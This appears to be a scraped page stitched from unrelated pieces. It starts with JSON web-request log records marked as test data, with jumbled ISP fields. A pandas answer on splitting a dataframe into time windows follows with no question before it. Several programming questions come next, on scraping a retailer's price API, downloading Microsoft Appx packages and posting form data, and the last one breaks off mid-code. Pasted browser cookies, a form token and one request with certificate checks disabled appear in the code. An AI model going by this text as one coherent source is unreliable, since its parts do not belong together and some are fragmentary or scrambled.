{"#timestamp":"2018-04-17T08:12:29.000Z","ISP":"ein.rcaelc uEn tIHcrcr,i","cache_result":"TCP_REFRESH_HIT","client_ip":"31.13.51.177","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/facebookviettan.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"edteclf1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":6705,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:29 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:31.000Z","ISP":"clr,Hncie uaIciEncr. ter","cache_result":"TCP_REFRESH_HIT","client_ip":"128.129.21.211","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/chantroimoimedia.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"edce1tlf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":6216,"ts_process_time":90,"ts_timestamp":"17\/Apr\/2018:08:12:31 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:43.000Z","ISP":"tnrI.ccenruiirlE He,c ca","cache_result":"TCP_REFRESH_MISS","client_ip":"225.14.12.26","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/general\/avada-contact-form-7.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ec1tfled","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.2","reply_length_bytes":504,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:43 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:43.000Z","ISP":"tariirs oftpooorCoMcn","cache_result":"ERR_CLIENT_ABORT","client_ip":"173.38.196.130","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit\/537.51.1 (KHTML, like Gecko) Version\/7.0 Mobile\/11A465 Safari\/9537.53 BingPreview\/1.0b","client_url":"\/amp_preconnect_polyfill_404_or_other_error_expected._Do_not_worry_about_it","client_user":"-","content_type":"text\/html","device":"Spider","dnet":"1ceetlfd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":404,"major":1.0,"os":"iOS","os_name":"iOS","querystring":"?1523952720000","reply_length_bytes":43261,"ts_process_time":1075,"ts_timestamp":"17\/Apr\/2018:08:12:43 -0000","type":"testdata","ua_name":"BingPreview"}
{"#timestamp":"2018-04-17T08:12:44.000Z","ISP":"i.nae,crHntc uiEcrlr ecI","cache_result":"TCP_REFRESH_HIT","client_ip":"217.198.69.197","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/dong-tam-bat-giu-cong-an-640x360.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"1teedfcl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":38627,"ts_process_time":228,"ts_timestamp":"17\/Apr\/2018:08:12:44 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:45.000Z","ISP":"c rcEn.,er reHciulitcanI","cache_result":"TCP_MISS","client_ip":"204.99.48.109","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/TMDuc.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"ceteldf1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":206,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":141770,"ts_process_time":512,"ts_timestamp":"17\/Apr\/2018:08:12:45 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:47.000Z","ISP":"Ht, eri enaErurcIcc.ciln","cache_result":"TCP_REFRESH_HIT","client_ip":"20.204.32.235","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/f1-13.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"tecfe1dl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":161573,"ts_process_time":593,"ts_timestamp":"17\/Apr\/2018:08:12:47 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:47.000Z","ISP":"Ei .ne,cHncrterarilccu I","cache_result":"TCP_REFRESH_HIT","client_ip":"224.60.44.234","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/04\/f1-9-177x142.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"1fecldet","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":10410,"ts_process_time":170,"ts_timestamp":"17\/Apr\/2018:08:12:47 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:48.000Z","ISP":"irre,n Iec.rciu ntlcHacE","cache_result":"TCP_REFRESH_HIT","client_ip":"68.18.239.120","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","client_user":"-","content_type":"image\/gif","device":"Other","dnet":"fcledet1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":847,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:48 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:21:23.000Z","ISP":"nnH rGmelbeen iOHzt","cache_result":"TCP_MISS","client_ip":"234.197.117.162","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\/534.58.2 (KHTML, like Gecko) Version\/5.1.8 Safari\/534.58.2","client_url":"\/Nhin-Thay-Gi-Tu-Mot-Hoi-Nghi.html","client_user":"-","content_type":"text\/html","device":"Other","dnet":"1ecfeldt","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":301,"major":5.0,"os":"Mac OS X","os_name":"Mac OS X","querystring":null,"reply_length_bytes":0,"ts_process_time":523,"ts_timestamp":"17\/Apr\/2018:08:21:23 -0000","type":"testdata","ua_name":"Safari"}
{"#timestamp":"2018-04-17T08:22:03.000Z","ISP":"Tx osoy1bcy dPdx hreah ia nOo ra-et51XsiaPttt","cache_result":"ERR_CLIENT_ABORT","client_ip":"218.202.132.77","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Linux; Android 5.1; A1601 Build\/LMY47I; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/64.0.3282.137 Mobile Safari\/537.36 [FB_IAB\/FB4A;FBAV\/166.0.0.66.95;]","client_url":"\/bat-binh-voi-toa-an-len-lut-giao-hat-van-hanh-noi-lua-hiep-thong-voi-tu-nhan-luong-tam\/","client_user":"-","content_type":"text\/html","device":"A1601","dnet":"ftee1dlc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":301,"major":166.0,"os":"Android","os_name":"Android","querystring":null,"reply_length_bytes":17707,"ts_process_time":31255,"ts_timestamp":"17\/Apr\/2018:08:22:03 -0000","type":"testdata","ua_name":"Facebook"}
{"#timestamp":"2018-04-17T08:21:25.000Z","ISP":"ne z briltHmOnHGeen","cache_result":"TCP_MISS","client_ip":"69.10.61.78","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\/534.58.2 (KHTML, like Gecko) Version\/5.1.8 Safari\/534.58.2","client_url":"\/nhin-thay-gi-tu-mot-hoi-nghi\/","client_user":"-","content_type":"text\/html","device":"Other","dnet":"cfdt1lee","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":5.0,"os":"Mac OS X","os_name":"Mac OS X","querystring":null,"reply_length_bytes":19351,"ts_process_time":1302,"ts_timestamp":"17\/Apr\/2018:08:21:25 -0000","type":"testdata","ua_name":"Safari"}
{"#timestamp":"2018-04-17T08:21:29.000Z","ISP":"gooLLeG lC","cache_result":"TCP_HIT","client_ip":"167.182.156.107","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (compatible; Google-Apps-Script)","client_url":"\/-","client_user":"-","content_type":"text\/html","device":"Other","dnet":"cee1tfld","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":null,"os":"Other","os_name":"Other","querystring":null,"reply_length_bytes":16962,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:21:29 -0000","type":"testdata","ua_name":"Other"}
{"#timestamp":"2018-04-17T08:21:28.000Z","ISP":"eLLol GCgo","cache_result":"TCP_HIT","client_ip":"207.89.148.171","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (compatible; Google-Apps-Script)","client_url":"\/-","client_user":"-","content_type":"text\/html","device":"Other","dnet":"c1dleeft","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":null,"os":"Other","os_name":"Other","querystring":null,"reply_length_bytes":16962,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:21:28 -0000","type":"testdata","ua_name":"Other"}
{"#timestamp":"2018-04-17T08:28:51.000Z","ISP":"oeClL LgoG","cache_result":"TCP_IMS_HIT","client_ip":"98.217.204.182","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Linux; Android 6.0.1; Nexus 5X Build\/MMB29P) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2272.96 Mobile Safari\/537.36 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html)","client_url":"\/wp-content\/plugins\/accelerated-mobile-pages\/templates\/design-manager\/design-3\/fonts\/ptserif\/PT_Serif-Web-Regular.ttf","client_user":"-","content_type":"-","device":"Spider","dnet":"efd1etlc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":304,"major":2.0,"os":"Android","os_name":"Android","querystring":null,"reply_length_bytes":0,"ts_process_time":0,"ts_timestamp":"17\/Apr\/2018:08:28:51 -0000","type":"testdata","ua_name":"Googlebot"}
With the following toy dataframe:
import pandas as pd
# Toy data: ten (timestamp string, value) rows, deliberately not in time order.
df = pd.DataFrame(
    [
        ("2018-04-17T08:12:32.000Z", 9),
        ("2018-04-17T08:11:33.000Z", 2),
        ("2018-04-17T08:14:31.000Z", 3),
        ("2018-04-17T08:25:35.000Z", 4),
        ("2018-04-17T08:16:36.000Z", 7),
        ("2018-04-17T08:10:42.000Z", 8),
        ("2018-04-17T08:18:38.000Z", 1),
        ("2018-04-17T08:09:29.000Z", 2),
        ("2018-04-17T08:30:40.000Z", 0),
        ("2018-04-17T08:21:21.000Z", 3),
    ],
    columns=["timestamp", "value"],
)
Here is one way to do it by defining a generator function:
def chunk(df, delta_in_min):
    """Split a time-indexed dataframe into consecutive fixed-width windows.

    Args:
        df: dataframe to split in chunks. Its first and last index values are
            used as the time bounds, so the index is expected to be sorted in
            ascending order and to support adding a ``pd.Timedelta``.
        delta_in_min: size of a chunk in minutes. With a value of zero or
            less no splitting is done and ``df`` is yielded once, unchanged.

    Yields:
        Slices of ``df`` for the half-open windows ``[start, start + delta)``,
        anchored at the first index value. A window that contains no row is
        yielded as an empty dataframe; the final window runs to the end of
        the index. An empty ``df`` yields nothing.
    """
    # Nothing to split: avoids an IndexError on df.index[0] below.
    if len(df.index) == 0:
        return
    # The chunk size never changes, so validate it once instead of per loop.
    if delta_in_min <= 0:
        yield df
        return
    step = pd.Timedelta(value=delta_in_min, unit="m")
    last = df.index[-1]
    start = df.index[0]
    while True:
        end = start + step
        if end > last:
            # Final window: take everything that is left, then stop.
            yield df.loc[df.index >= start, :]
            return
        yield df.loc[(df.index >= start) & (df.index < end), :]
        # Here end <= last, so the next window always starts inside the data.
        start = end
And then:
# Parse the timestamp strings into datetimes. The deprecated
# infer_datetime_format flag is not passed: pandas 2.x ignores it and
# only emits a warning.
df["timestamp"] = pd.to_datetime(df["timestamp"])
# chunk() reads the first and last index values as time bounds, so the
# frame is indexed by timestamp and sorted.
df = df.set_index("timestamp").sort_index()
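From here, you can create the generator once with gen = chunk(df, 2) and call print(next(gen)) repeatedly to get each chunk (calling next(chunk(df, 2)) directly would build a new generator every time and always return the first chunk), or use a for loop, like this: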
# Print every two-minute window in order, empty ones included.
for window in chunk(df, 2):
    print(window)
# Output
value
timestamp
2018-04-17 08:09:29+00:00 2
2018-04-17 08:10:42+00:00 8
value
timestamp
2018-04-17 08:11:33+00:00 2
2018-04-17 08:12:32+00:00 9
value
timestamp
2018-04-17 08:14:31+00:00 3
value
timestamp
2018-04-17 08:16:36+00:00 7
value
timestamp
2018-04-17 08:18:38+00:00 1
value
timestamp
2018-04-17 08:21:21+00:00 3
Empty DataFrame
Columns: [value]
Index: []
Empty DataFrame
Columns: [value]
Index: []
value
timestamp
2018-04-17 08:25:35+00:00 4
Empty DataFrame
Columns: [value]
Index: []
value
timestamp
2018-04-17 08:30:40+00:00 0

Webscraping website - can't print price - api & json i think

I'm having trouble getting this website's price to print. I think I'm close, but I'm getting the error below.
Please help, thanks.
"
{'statusDetails': {'state': 'FAILURE', 'errorCode': 'SYS-3003', 'correlationid': 'rrt-5636881267628447407-b-gsy1-18837-18822238-1', 'description': 'Invalid key identifier or token'}}
"
code:
import requests
import json
# A single session is used for both requests below.
s = requests.Session()
url = 'https://www.bunnings.com.au/ozito-pxc-2-x-18v-cordless-line-trimmer-skin-only_p0167719'
header = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36',
}
# Load the product page first; its response is not inspected afterwards.
resp = s.get(url, headers=header)
# Fulfilment endpoint for product 0167719; nothing is interpolated into it.
api_url = 'https://api.prod.bunnings.com.au/v1/products/0167719/fulfillment/6400/radius/100000?isToggled=true'
price_resp = s.get(api_url, headers=header).json()
print(price_resp)
# Intended extraction once the API call succeeds:
#price = price_resp['data']['price']['value']
#print(price)

Download Access Denied

Introduction
Hi! I'm trying to download application content types from Microsoft TLU Delivery. Every download results in a corrupted file: the downloaded files are only 1 KB in size, while the original ones are 200 KB or more. I have already tried using custom headers and cookies in the download functions, but the result is still the same. Here's the network information that I get from the Chrome console:
Request URL: http://tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f7ded4c4-f468-4bdc-96f0-03fd60c5ae81?p1=1604760658&p2=402&p3=2&p4=hcdsxul%2f8qkk8gjjjyomq0ki%2bxwjxulxxeninyf1jqrp3%2bsnzk%2fpwk4dgsnbkfzkzoor4%2bvaixilmxk6r%2bz6%2ba%3d%3d
Request Method: GET
Status Code: 200 OK
Remote Address: 8.241.131.254:80
Referrer Policy: strict-origin-when-cross-origin
#Response Header
Accept-Ranges: bytes
Age: 240667
Cache-Control: public, max-age=17280000
Connection: keep-alive
Content-Disposition: attachment; filename=Microsoft.Services.Store.Engagement_10.0.19011.0_x64__8wekyb3d8bbwe.Appx
Content-Length: 281728
Content-Type: application/octet-stream
Date: Sat, 21 Nov 2020 22:49:40 GMT
ETag: "cP6LQFFTB9bLaXCyN/YHr8kWbqM="
Expires: Wed, 09 Jun 2021 22:49:58 GMT
g: g
Last-Modified: Wed, 30 Jan 2019 14:28:15 GMT
MS-CorrelationId: c93312f7-dc52-41ef-b2d2-9294c1deda19
MS-CV: /24yhmSg0EivGZOl.0.3.8.2.1.0.0.22.2.6.2.1.1.0
MS-RequestId: 9378576c-a791-4636-93bf-7b8ef57c85a3
MSRegion: APAC
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 5.2
x-ccc: SG
x-cid: 3
X-MS-Ref-OriginShield: Ref A: 4127806A5D794419ACF51D29DD883F50 Ref B: BAYEDGE0319 Ref C: 2019-01-30T14:32:41Z
X-MSEdge-Ref: Ref A: 6F76857D59174A4BA37F3076DE6671DC Ref B: SJCEDGE0406 Ref C: 2019-01-30T14:32:41Z
X-Powered-By: ASP.NET
#Request header
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8,pt;q=0.7
Connection: keep-alive
Cookie: _ga=GA1.2.282065737.1604285823; MUID=07B92E6562A266AE0A83211366A260EF; AAMC_mscom_0=REGION%7C3; aam_uuid=33272659623977483402062764826775668547; mbox=PC#f8f94dce007c4a3c88788082771689c3.38_0#1668947906|session#af45a09527ce4486be93aff7c2a9adf1#1605704965; _cs_c=0; _cs_id=cd07a4b3-19b2-a8c7-95e4-7b8fd7c286f9.1605703107.1.1605703107.1605703107.1594299326.1639867107380.Lax.0; _uetvid=c457b5101e8a11eb956e2f93309fcf0c; IR_PI=f62c6991-299a-11eb-980c-0abbe301118c%7C1605789507507
DNT: 1
Host: tlu.dl.delivery.mp.microsoft.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
#Query String
p1: 1604760658
p2: 402
p3: 2
p4: hcdsxul/8qkk8gjjjyomq0ki+xwjxulxxeninyf1jqrp3+snzk/pwk4dgsnbkfzkzoor4+vaixilmxk6r+z6+a==
Problem
Here are the several download functions that I've tried:
from clint import textui
from clint.textui import progress
import urllib.request
import requests
from tqdm import tqdm
from urllib.request import FancyURLopener
from tqdm import tqdm
class DownloadProgressBar(tqdm):
    """tqdm progress bar that can be driven by block-count callbacks."""

    def update_to(self, b=1, bsize=1, tsize=None):
        """Move the bar to the position ``b * bsize``.

        Args:
            b: number of blocks transferred so far.
            bsize: size of one block.
            tsize: total size; when given it replaces the bar's total.
        """
        if tsize is not None:
            self.total = tsize
        transferred = b * bsize
        # update() expects an increment, so subtract the current position.
        self.update(transferred - self.n)
def CookDown(url, filename):
    """Download ``url`` to ``filename`` using browser-like headers and cookies.

    Prints a success message once the file has been written. If the request
    fails, or the server answers with an HTTP error status, an error message
    is printed instead and no file is written.

    Args:
        url: address of the file to fetch.
        filename: path of the local file to create.
    """
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
    cookies = {'_ga': 'GA1.2.282065737.1604285823', 'MUID': '07B92E6562A266AE0A83211366A260EF','aam_uuid': '33272659623977483402062764826775668547','AAMC_mscom_0': 'REGION%7C3','_cs_c': '0','_cs_id': 'cd07a4b3-19b2-a8c7-95e4-7b8fd7c286f9.1605703107.1.1605703107.1605703107.1594299326.1639867107380.Lax.0','_uetvid': 'c457b5101e8a11eb956e2f93309fcf0c','IR_PI': 'f62c6991-299a-11eb-980c-0abbe301118c%7C1605789507507','mbox': 'PC#f8f94dce007c4a3c88788082771689c3.38_0#1668947906|session#af45a09527ce4486be93aff7c2a9adf1#1605704965'}
    try:
        # stream=True fetches the body chunk by chunk instead of loading it
        # into memory before the first write.
        with requests.get(url, headers=headers, cookies=cookies, stream=True) as read:
            # A 4xx/5xx answer carries an error page, not the file: raise
            # here so that page is never saved under ``filename``.
            read.raise_for_status()
            with open(filename, 'wb') as w:
                for chunk in read.iter_content(chunk_size=8192):
                    if chunk:
                        w.write(chunk)
    except requests.exceptions.RequestException as e:
        # requests reports failures through its own exception hierarchy,
        # not through urllib's URLError.
        print("Error :%s" % e)
    else:
        print(filename + ' downloaded successfully!!!')
def Cookdone(url, filename):
    """Stream ``url`` into ``filename`` while showing a tqdm progress counter.

    Args:
        url: address of the file to fetch.
        filename: path of the local file to create.
    """
    r = requests.get(url, stream=True)
    with open(filename, "wb") as f:
        # Iterate the response stored in ``r``; an explicit chunk size avoids
        # the one-byte-per-iteration default of iter_content().
        for data in tqdm(r.iter_content(chunk_size=8192)):
            f.write(data)
def Cookdown(url, filename):
    """Copy the raw response body of ``url`` into ``filename``.

    The response headers are printed before the body is written. This
    variant sends no custom headers or cookies.

    Args:
        url: address of the file to fetch.
        filename: path of the local file to create.
    """
    import shutil

    response = requests.get(url, stream=True)
    print(response.headers)
    with open(filename, "wb") as out:
        # Write the bytes as received, without content decoding.
        response.raw.decode_content = False
        shutil.copyfileobj(response.raw, out)
def download(url, path):
    """Download ``url`` to ``path`` with a browser User-Agent, using urllib only.

    ``FancyURLopener`` is deprecated and removed in recent Python versions,
    and it saves HTTP error pages as if they were the file. ``urlopen`` is
    used instead, so a failed request raises and writes nothing.

    Args:
        url: address of the file to fetch.
        path: path of the local file to create.

    Raises:
        urllib.error.HTTPError: the server answered with an error status.
        urllib.error.URLError: the request could not be completed.
    """
    import shutil

    request = urllib.request.Request(
        url,
        headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'},
    )
    # The target file is only opened after the request has succeeded.
    with urllib.request.urlopen(request) as response, open(path, 'wb') as out:
        shutil.copyfileobj(response, out)
def down(url, filename):
    """Download ``url`` to ``filename`` through a proxy-less urllib opener.

    Note that the opener is installed globally, so later ``urlopen`` /
    ``urlretrieve`` calls in the same process use it as well.

    Args:
        url: address of the file to fetch.
        filename: path of the local file to create.
    """
    # Only ``urllib.request`` itself is imported by this file, so every
    # helper is referenced through the module.
    # An empty mapping means no proxy is configured on this handler.
    proxy = urllib.request.ProxyHandler({})
    opener = urllib.request.build_opener(proxy)
    opener.addheaders = [('User-Agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30')]
    urllib.request.install_opener(opener)
    urllib.request.urlretrieve(url, filename)
def DownLoad(url, filename):
    """Fetch ``url`` with a browser User-Agent and save the body to ``filename``.

    Args:
        url: address of the file to fetch; redirects are followed.
        filename: path of the local file to create.
    """
    user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'
    reply = requests.get(url, allow_redirects=True, headers={'User-Agent': user_agent})
    with open(filename, 'wb') as target:
        # Write the body in pieces of 1024 bytes.
        target.writelines(reply.iter_content(1024))
def DoneLoad():
    """Download ``url`` to ``filename`` with a clint progress bar.

    NOTE(review): ``url`` and ``filename`` are not parameters; they are read
    from the enclosing (module) scope and must be defined there before this
    function is called.
    """
    headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36'}
    # stream=True so the bar advances while data arrives instead of after the
    # whole body has already been downloaded.
    r = requests.get(url, allow_redirects=True, headers=headers, stream=True)
    chunks = r.iter_content(chunk_size=1024)
    content_length = r.headers.get('content-length')
    if content_length is not None:
        total_length = int(content_length)
        chunks = progress.bar(chunks, expected_size=(total_length/1024) + 1)
    # Without a Content-Length header the size is unknown: the file is still
    # written, just without a progress bar (int(None) would raise TypeError).
    with open(filename, 'wb') as f:
        for chunk in chunks:
            if chunk:
                f.write(chunk)
                f.flush()
def Download(url, path):
    """Download ``url`` to ``path`` with a browser User-Agent via ``urlopen``.

    ``urlretrieve`` only accepts a URL string, so the prepared ``Request``
    (which carries the header) is opened with ``urlopen`` and the body is
    copied to disk.

    Args:
        url: address of the file to fetch.
        path: path of the local file to create.

    Raises:
        urllib.error.HTTPError: the server answered with an error status.
        urllib.error.URLError: the request could not be completed.
    """
    import shutil

    hdr = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' }
    req = urllib.request.Request(url, headers=hdr)
    # The target file is only opened after the request has succeeded.
    with urllib.request.urlopen(req) as response, open(path, 'wb') as out:
        shutil.copyfileobj(response, out)
def downLoader(url, output_path):
    """Download ``url`` to ``output_path`` with a ``DownloadProgressBar``.

    The bar is labelled with the last ``/``-separated part of the URL. The
    opener carrying the User-agent header is installed globally.

    Args:
        url: address of the file to fetch.
        output_path: path of the local file to create.
    """
    label = url.split('/')[-1]
    agent = ('User-agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36')
    with DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=label) as bar:
        custom_opener = urllib.request.build_opener()
        custom_opener.addheaders = [agent]
        urllib.request.install_opener(custom_opener)
        # urlretrieve reports progress through the bar's update_to hook.
        urllib.request.urlretrieve(url, filename=output_path, reporthook=bar.update_to)
def downLoad(url, output_path):
    """Stream ``url`` into ``output_path`` with a browser User-Agent.

    NOTE(review): the request is made with ``verify=False``, i.e. TLS
    certificate verification is switched off.

    Args:
        url: address of the file to fetch.
        output_path: path of the local file to create.
    """
    request_headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' }
    reply = requests.get(url, headers=request_headers, verify=False, stream=True)
    with open(output_path, 'wb') as sink:
        # chunk_size=None: take the data in whatever sizes it arrives.
        for piece in reply.iter_content(chunk_size=None):
            sink.write(piece)
Here's the piece of code used to execute each function:
# Fetch the Appx package and store it under its file name.
CookDown(
    'http://tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/f7ded4c4-f468-4bdc-96f0-03fd60c5ae81?p1=1604760658&p2=402&p3=2&p4=hcdsxul%2f8qkk8gjjjyomq0ki%2bxwjxulxxeninyf1jqrp3%2bsnzk%2fpwk4dgsnbkfzkzoor4%2bvaixilmxk6r%2bz6%2ba%3d%3d',
    'Microsoft.Services.Store.Engagement_10.0.19011.0_x64__8wekyb3d8bbwe.appx',
)
Every function produced the same corrupted file. Any answers will be hugely appreciated, because I'm stuck and have run out of ideas. Please, Stack Overflow gods... come here :D

I can't send form data to Python Jupyter

I'm trying to build a Python script that sends a POST request with parameters and extracts the result, but I don't know where my problem is or why I can't get the result page with the HTML that I need...
import requests
# Quote form endpoint.
url = 'https://ar.ec.universal-assistance.com/cotizar-asistencia-al-viajero'
# Form fields, in the order they are submitted.
data = {
    '__RequestVerificationToken': 'QWsTn0wqFmW9_jFfaBuuOjaWM4TE2Xk1XGn-oDTp0TENBO725YSkGnK8WeiAN53-jiPnjTDJ6zbZQjb6SzpprdCT4OlJg9jjZJKx1Wh7fGkZ5yCLkArUWCp6AIwq0t12gsonhP3orHzFJ2_1YqvIfJMcnzn2aXCb1-ZrDOzHM701',
    'CCTLD': '.ar',
    'CodigoOrganizacion': "",
    'CodigoConvenio': "",
    'OcultarTipoViaje': 'false',
    'CantidadPasajeros': 1,
    'CantidadDias': 3,
    'Origen': 'ARGENTINA',
    'Destino': 'Centro america/Caribe',
    'TipoViaje': 'Un viaje',
    'FechaInicio': '20/06/2019',
    'FechaFin': '22/06/2019',
    'Edad1': 27,
    # Edad2 .. Edad10 are sent as empty fields.
    **{'Edad%d' % n: "" for n in range(2, 11)},
    'Email': 'no#no.com',
    'Nombre': 'PEDRO',
    'Apellido': 'PEREZ',
    'CodigoArea': 800,
